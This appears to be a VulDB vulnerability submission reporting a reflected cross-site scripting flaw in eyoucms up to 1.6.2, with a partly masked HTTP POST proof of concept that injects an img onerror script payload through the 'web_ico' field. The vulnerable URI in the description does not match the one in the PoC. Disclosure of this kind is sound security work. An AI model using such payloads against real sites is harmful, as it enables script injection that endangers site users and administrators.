| Title | eyoucms up to 1.6.2 'web_ico' reflected XSS vulnerability |
|---|---|
| Description | eyoucms up to 1.6.2 has an XSS vulnerability. The vulnerable URI is `/yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4` and the vulnerable multipart parameter is `name="web_ico"`. PoC below; see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md |

PoC (lines masked with asterisks in the original submission):

```http
POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"

<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--
```

| Source | ⚠️ https://www.eyoucms.com/ |
|---|---|
| User | WWesleywww (UID 43117) |
| Submission | 07/04/2023 03:36 PM (3 years ago) |
| Moderation | 14/04/2023 10:36 AM (7 days later) |
| Status | Accepted |
| VulDB Entry | 225943 [EyouCms up to 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico cross site scripting] |
| Points | 17 |